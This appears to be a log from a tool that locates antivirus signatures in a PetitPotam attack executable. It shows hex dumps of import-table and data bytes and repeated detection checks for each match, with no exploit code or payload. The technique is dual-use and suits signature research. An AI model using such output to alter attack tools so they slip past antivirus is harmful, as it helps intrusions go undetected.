[INFO    ][2023-07-21 13:37:16,144] _printStatus() :: Reducing: 738 chunks done, found 19 matches (260 added)
[INFO    ][2023-07-21 13:37:16,984] _scanDataPart() :: Result: 101232-101247 (15b minChunk:8 X)
00018B70   D9 01 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E       ..GetCommandLin
[INFO    ][2023-07-21 13:37:17,660] _scanDataPart() :: Result: 101247-101278 (31 bytes)
00018B7F   65 41 00 DA 01 47 65 74 43 6F 6D 6D 61 6E 64 4C    eA...GetCommandL
00018B8F   69 6E 65 57 00 48 03 48 65 61 70 41 6C 6C 6F       ineW.H.HeapAllo
[INFO    ][2023-07-21 13:37:18,353] _printStatus() :: Reducing: 742 chunks done, found 20 matches (262 added)
[INFO    ][2023-07-21 13:37:19,932] _scanDataPart() :: Result: 101278-101293 (15b minChunk:8 X)
00018B9E   63 00 4C 03 48 65 61 70 46 72 65 65 00 00 9E       c.L.HeapFree...
[INFO    ][2023-07-21 13:37:20,784] _printStatus() :: Reducing: 746 chunks done, found 20 matches (263 added)
[INFO    ][2023-07-21 13:37:20,784] _scanDataPart() :: Result: 101323-101339 (16b minChunk:8 X)
00018BCB   57 00 00 51 02 47 65 74 46 69 6C 65 54 79 70 65    W..Q.GetFileType
[INFO    ][2023-07-21 13:37:22,483] _scanDataPart() :: Result: 101384-101400 (16b minChunk:8 X)
00018C08   6C 65 57 00 8F 03 49 73 56 61 6C 69 64 43 6F 64    leW...IsValidCod
[INFO    ][2023-07-21 13:37:23,354] _printStatus() :: Reducing: 751 chunks done, found 22 matches (265 added)
[INFO    ][2023-07-21 13:37:25,403] _printStatus() :: Reducing: 754 chunks done, found 22 matches (265 added)
[INFO    ][2023-07-21 13:37:26,153] _scanDataPart() :: Result: 101400-101415 (15b minChunk:8 X)
00018C18   65 50 61 67 65 00 B5 01 47 65 74 41 43 50 00       ePage...GetACP.
[INFO    ][2023-07-21 13:37:26,847] _scanDataPart() :: Result: 101430-101461 (31 bytes)
00018C36   47 65 74 43 50 49 6E 66 6F 00 F3 03 4D 75 6C 74    GetCPInfo...Mult
00018C46   69 42 79 74 65 54 6F 57 69 64 65 43 68 61 72       iByteToWideChar
[INFO    ][2023-07-21 13:37:27,548] _printStatus() :: Reducing: 758 chunks done, found 23 matches (267 added)
[INFO    ][2023-07-21 13:37:28,402] _scanDataPart() :: Result: 101476-101491 (15b minChunk:8 X)
00018C64   6C 74 69 42 79 74 65 00 3A 02 47 65 74 45 6E       ltiByte.:.GetEn
[INFO    ][2023-07-21 13:37:29,116] _scanDataPart() :: Result: 101491-101522 (31 bytes)
00018C73   76 69 72 6F 6E 6D 65 6E 74 53 74 72 69 6E 67 73    vironmentStrings
00018C83   57 00 00 AD 01 46 72 65 65 45 6E 76 69 72 6F       W....FreeEnviro
[INFO    ][2023-07-21 13:37:29,798] _printStatus() :: Reducing: 762 chunks done, found 24 matches (269 added)
[INFO    ][2023-07-21 13:37:31,332] _scanDataPart() :: Result: 101522-101537 (15b minChunk:8 X)
00018C92   6E 6D 65 6E 74 53 74 72 69 6E 67 73 57 00 16       nmentStringsW..
[INFO    ][2023-07-21 13:37:32,140] _printStatus() :: Reducing: 766 chunks done, found 24 matches (270 added)
[INFO    ][2023-07-21 13:37:32,140] _scanDataPart() :: Result: 101567-101583 (16b minChunk:8 X)
00018CBF   53 74 64 48 61 6E 64 6C 65 00 00 DA 02 47 65 74    StdHandle....Get
[INFO    ][2023-07-21 13:37:33,637] _scanDataPart() :: Result: 101583-101613 (30 bytes)
00018CCF   53 74 72 69 6E 67 54 79 70 65 57 00 00 B7 02 47    StringTypeW....G
00018CDF   65 74 50 72 6F 63 65 73 73 48 65 61 70 00          etProcessHeap.
[INFO    ][2023-07-21 13:37:33,637] scan() :: Reducer Result: Time:124 Chunks:768 MatchesAdded:272 MatchesFinal:25
[INFO    ][2023-07-21 13:37:35,099] scanForMatchesInPe() :: Launching bytes analysis on section: .data (101888-104448)
[INFO    ][2023-07-21 13:37:35,099] scan() :: Reducer Start: ScanSpeed:Normal Iteration:2 MinChunkSize:2 MinMatchSize:4
[INFO    ][2023-07-21 13:37:35,099] _printStatus() :: Reducing: 769 chunks done, found 0 matches (272 added)
[INFO    ][2023-07-21 13:37:37,434] _printStatus() :: Reducing: 778 chunks done, found 0 matches (272 added)
[INFO    ][2023-07-21 13:37:37,434] _scanDataPart() :: Result: 102018-102023 (5b minChunk:2 X)
00018E82   00 00 02 20 00                                     ... .
[INFO    ][2023-07-21 13:37:40,024] _printStatus() :: Reducing: 782 chunks done, found 1 matches (273 added)
[INFO    ][2023-07-21 13:37:40,837] _scanDataPart() :: Result: 102173-102178 (5b minChunk:2 X)
00018F1D   00 00 00 80 00                                     .....
[INFO    ][2023-07-21 13:37:42,645] _printStatus() :: Reducing: 787 chunks done, found 2 matches (274 added)
[INFO    ][2023-07-21 13:37:43,462] _scanDataPart() :: Result: 102383-102388 (5b minChunk:2 X)
00018FEF   00 38 A1 41 00                                     .8.A.
[INFO    ][2023-07-21 13:37:43,462] scan() :: Reducer Result: Time:8 Chunks:791 MatchesAdded:275 MatchesFinal:3
[INFO    ][2023-07-21 13:37:43,462] handleFile() :: Result: 93 matches
[INFO    ][2023-07-21 13:37:43,462] saveToFile() :: Saving results to: app/upload/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-07-21 13:37:44,142] save() :: Saving HashCache (51315)
[INFO    ][2023-07-21 13:37:44,201] verifyFile() :: Perform verification of matches
[INFO    ][2023-07-21 13:37:44,201] runVerifications() :: Verify 93 matches
[INFO    ][2023-07-21 13:38:08,518] runVerifications() :: Verification run: 0 MIDDLE8 ISOLATED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED

[INFO    ][2023-07-21 13:38:34,164] runVerifications() :: Verification run: 1 THIRDS4 ISOLATED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED

[INFO    ][2023-07-21 13:39:01,233] runVerifications() :: Verification run: 2 FULL ISOLATED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED

[INFO    ][2023-07-21 13:39:28,261] runVerifications() :: Verification run: 3 FULLB ISOLATED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_DETECTED

[INFO    ][2023-07-21 13:39:58,355] runVerifications() :: Verification run: 4 MIDDLE8 INCREMENTAL
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 1  result: ScanResult.NOT_DETECTED
  Idx: 2  result: ScanResult.NOT_DETECTED
  Idx: 3  result: ScanResult.NOT_DETECTED
  Idx: 4  result: ScanResult.NOT_DETECTED
  Idx: 5  result: ScanResult.NOT_DETECTED
  Idx: 6  result: ScanResult.NOT_DETECTED
  Idx: 7  result: ScanResult.NOT_DETECTED
  Idx: 8  result: ScanResult.NOT_DETECTED
  Idx: 9  result: ScanResult.NOT_DETECTED
  Idx: 10  result: ScanResult.NOT_DETECTED
  Idx: 11  result: ScanResult.NOT_DETECTED
  Idx: 12  result: ScanResult.NOT_DETECTED
  Idx: 13  result: ScanResult.NOT_DETECTED
  Idx: 14  result: ScanResult.NOT_DETECTED
  Idx: 15  result: ScanResult.NOT_DETECTED
  Idx: 16  result: ScanResult.NOT_DETECTED
  Idx: 17  result: ScanResult.NOT_DETECTED
  Idx: 18  result: ScanResult.NOT_DETECTED
  Idx: 19  result: ScanResult.NOT_DETECTED
  Idx: 20  result: ScanResult.NOT_DETECTED
  Idx: 21  result: ScanResult.NOT_DETECTED
  Idx: 22  result: ScanResult.NOT_DETECTED
  Idx: 23  result: ScanResult.NOT_DETECTED
  Idx: 24  result: ScanResult.NOT_DETECTED
  Idx: 25  result: ScanResult.NOT_DETECTED
  Idx: 26  result: ScanResult.NOT_DETECTED
  Idx: 27  result: ScanResult.NOT_DETECTED
  Idx: 28  result: ScanResult.NOT_DETECTED
  Idx: 29  result: ScanResult.NOT_DETECTED
  Idx: 30  result: ScanResult.NOT_DETECTED
  Idx: 31  result: ScanResult.NOT_DETECTED
  Idx: 32  result: ScanResult.NOT_DETECTED
  Idx: 33  result: ScanResult.NOT_DETECTED
  Idx: 34  result: ScanResult.NOT_DETECTED
  Idx: 35  result: ScanResult.NOT_DETECTED
  Idx: 36  result: ScanResult.NOT_DETECTED
  Idx: 37  result: ScanResult.NOT_DETECTED
  Idx: 38  result: ScanResult.NOT_DETECTED
  Idx: 39  result: ScanResult.NOT_DETECTED
  Idx: 40  result: ScanResult.NOT_DETECTED
  Idx: 41  result: ScanResult.NOT_DETECTED
  Idx: 42  result: ScanResult.NOT_DETECTED
  Idx: 43  result: ScanResult.NOT_DETECTED
  Idx: 44  result: ScanResult.NOT_DETECTED
  Idx: 45  result: ScanResult.NOT_DETECTED
  Idx: 46  result: ScanResult.NOT_DETECTED
  Idx: 47  result: ScanResult.NOT_DETECTED
  Idx: 48  result: ScanResult.NOT_DETECTED
  Idx: 49  result: ScanResult.NOT_DETECTED
  Idx: 50  result: ScanResult.NOT_DETECTED
  Idx: 51  result: ScanResult.NOT_DETECTED
  Idx: 52  result: ScanResult.NOT_DETECTED
  Idx: 53  result: ScanResult.NOT_DETECTED
  Idx: 54  result: ScanResult.NOT_DETECTED
  Idx: 55  result: ScanResult.NOT_DETECTED
  Idx: 56  result: ScanResult.NOT_DETECTED
  Idx: 57  result: ScanResult.NOT_DETECTED
  Idx: 58  result: ScanResult.NOT_DETECTED
  Idx: 59  result: ScanResult.NOT_DETECTED
  Idx: 60  result: ScanResult.NOT_DETECTED
  Idx: 61  result: ScanResult.NOT_DETECTED
  Idx: 62  result: ScanResult.NOT_DETECTED
  Idx: 63  result: ScanResult.NOT_DETECTED
  Idx: 64  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  Idx: 67  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  Idx: 71  result: ScanResult.NOT_DETECTED
  Idx: 72  result: ScanResult.NOT_DETECTED
  Idx: 73  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  Idx: 75  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  Idx: 78  result: ScanResult.NOT_DETECTED
  Idx: 79  result: ScanResult.NOT_DETECTED
  Idx: 80  result: ScanResult.NOT_DETECTED
  Idx: 81  result: ScanResult.NOT_DETECTED
  Idx: 82  result: ScanResult.NOT_DETECTED
  Idx: 83  result: ScanResult.NOT_DETECTED
  Idx: 84  result: ScanResult.NOT_DETECTED
  Idx: 85  result: ScanResult.NOT_DETECTED
  Idx: 86  result: ScanResult.NOT_DETECTED
  Idx: 87  result: ScanResult.NOT_DETECTED
  Idx: 88  result: ScanResult.NOT_DETECTED
  Idx: 89  result: ScanResult.NOT_DETECTED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED
  result: ScanResult.NOT_SCANNED

[INFO    ][2023-07-21 13:40:31,797] runVerifications() :: Verification run: 5 FULL INCREMENTAL
  Idx: 0  result: ScanResult.NOT_DETECTED
  Idx: 1  result: ScanResult.NOT_DETECTED
  Idx: 2  result: ScanResult.NOT_DETECTED
  Idx: 3  result: ScanResult.NOT_DETECTED
  Idx: 4  result: ScanResult.NOT_DETECTED
  Idx: 5  result: ScanResult.NOT_DETECTED
  Idx: 6  result: ScanResult.NOT_DETECTED
  Idx: 7  result: ScanResult.NOT_DETECTED
  Idx: 8  result: ScanResult.NOT_DETECTED
  Idx: 9  result: ScanResult.NOT_DETECTED
  Idx: 10  result: ScanResult.NOT_DETECTED
  Idx: 11  result: ScanResult.NOT_DETECTED
  Idx: 12  result: ScanResult.NOT_DETECTED
  Idx: 13  result: ScanResult.NOT_DETECTED
  Idx: 14  result: ScanResult.NOT_DETECTED
  Idx: 15  result: ScanResult.NOT_DETECTED
  Idx: 16  result: ScanResult.NOT_DETECTED
  Idx: 17  result: ScanResult.NOT_DETECTED
  Idx: 18  result: ScanResult.NOT_DETECTED
  Idx: 19  result: ScanResult.NOT_DETECTED
  Idx: 20  result: ScanResult.NOT_DETECTED
  Idx: 21  result: ScanResult.NOT_DETECTED
  Idx: 22  result: ScanResult.NOT_DETECTED
  Idx: 23  result: ScanResult.NOT_DETECTED
  Idx: 24  result: ScanResult.NOT_DETECTED
  Idx: 25  result: ScanResult.NOT_DETECTED
  Idx: 26  result: ScanResult.NOT_DETECTED
  Idx: 27  result: ScanResult.NOT_DETECTED
  Idx: 28  result: ScanResult.NOT_DETECTED
  Idx: 29  result: ScanResult.NOT_DETECTED
  Idx: 30  result: ScanResult.NOT_DETECTED
  Idx: 31  result: ScanResult.NOT_DETECTED
  Idx: 32  result: ScanResult.NOT_DETECTED
  Idx: 33  result: ScanResult.NOT_DETECTED
  Idx: 34  result: ScanResult.NOT_DETECTED
  Idx: 35  result: ScanResult.NOT_DETECTED
  Idx: 36  result: ScanResult.NOT_DETECTED
  Idx: 37  result: ScanResult.NOT_DETECTED
  Idx: 38  result: ScanResult.NOT_DETECTED
  Idx: 39  result: ScanResult.NOT_DETECTED
  Idx: 40  result: ScanResult.NOT_DETECTED
  Idx: 41  result: ScanResult.NOT_DETECTED
  Idx: 42  result: ScanResult.NOT_DETECTED
  Idx: 43  result: ScanResult.NOT_DETECTED
  Idx: 44  result: ScanResult.NOT_DETECTED
  Idx: 45  result: ScanResult.NOT_DETECTED
  Idx: 46  result: ScanResult.NOT_DETECTED
  Idx: 47  result: ScanResult.NOT_DETECTED
  Idx: 48  result: ScanResult.NOT_DETECTED
  Idx: 49  result: ScanResult.NOT_DETECTED
  Idx: 50  result: ScanResult.NOT_DETECTED
  Idx: 51  result: ScanResult.NOT_DETECTED
  Idx: 52  result: ScanResult.NOT_DETECTED
  Idx: 53  result: ScanResult.NOT_DETECTED
  Idx: 54  result: ScanResult.NOT_DETECTED
  Idx: 55  result: ScanResult.NOT_DETECTED
  Idx: 56  result: ScanResult.NOT_DETECTED
  Idx: 57  result: ScanResult.NOT_DETECTED
  Idx: 58  result: ScanResult.NOT_DETECTED
  Idx: 59  result: ScanResult.NOT_DETECTED
  Idx: 60  result: ScanResult.NOT_DETECTED
  Idx: 61  result: ScanResult.NOT_DETECTED
  Idx: 62  result: ScanResult.NOT_DETECTED
  Idx: 63  result: ScanResult.NOT_DETECTED
  Idx: 64  result: ScanResult.NOT_DETECTED
  Idx: 65  result: ScanResult.NOT_DETECTED
  Idx: 66  result: ScanResult.NOT_DETECTED
  Idx: 67  result: ScanResult.NOT_DETECTED
  Idx: 68  result: ScanResult.NOT_DETECTED
  Idx: 69  result: ScanResult.NOT_DETECTED
  Idx: 70  result: ScanResult.NOT_DETECTED
  Idx: 71  result: ScanResult.NOT_DETECTED
  Idx: 72  result: ScanResult.NOT_DETECTED
  Idx: 73  result: ScanResult.NOT_DETECTED
  Idx: 74  result: ScanResult.NOT_DETECTED
  Idx: 75  result: ScanResult.NOT_DETECTED
  Idx: 76  result: ScanResult.NOT_DETECTED
  Idx: 77  result: ScanResult.NOT_DETECTED
  Idx: 78  result: ScanResult.NOT_DETECTED
  Idx: 79  result: ScanResult.NOT_DETECTED
  Idx: 80  result: ScanResult.NOT_DETECTED
  Idx: 81  result: ScanResult.NOT_DETECTED
  Idx: 82  result: ScanResult.NOT_DETECTED
  Idx: 83  result: ScanResult.NOT_DETECTED
  Idx: 84  result: ScanResult.NOT_DETECTED
  Idx: 85  result: ScanResult.NOT_DETECTED
  Idx: 86  result: ScanResult.NOT_DETECTED
  Idx: 87  result: ScanResult.NOT_DETECTED
  Idx: 88  result: ScanResult.NOT_DETECTED
  Idx: 89  result: ScanResult.NOT_DETECTED
  Idx: 90  result: ScanResult.NOT_DETECTED
  Idx: 91  result: ScanResult.NOT_DETECTED
  Idx: 92  result: ScanResult.NOT_DETECTED

[INFO    ][2023-07-21 13:41:04,775] runVerifications() :: Verification run: 6 FULL DECREMENTAL
  Idx: 92  result: ScanResult.NOT_DETECTED
  Idx: 91  result: ScanResult.NOT_DETECTED
  Idx: 90  result: ScanResult.NOT_DETECTED
  Idx: 89  result: ScanResult.NOT_DETECTED
  Idx: 88  result: ScanResult.NOT_DETECTED
  Idx: 87  result: ScanResult.NOT_DETECTED
  Idx: 86  result: ScanResult.NOT_DETECTED
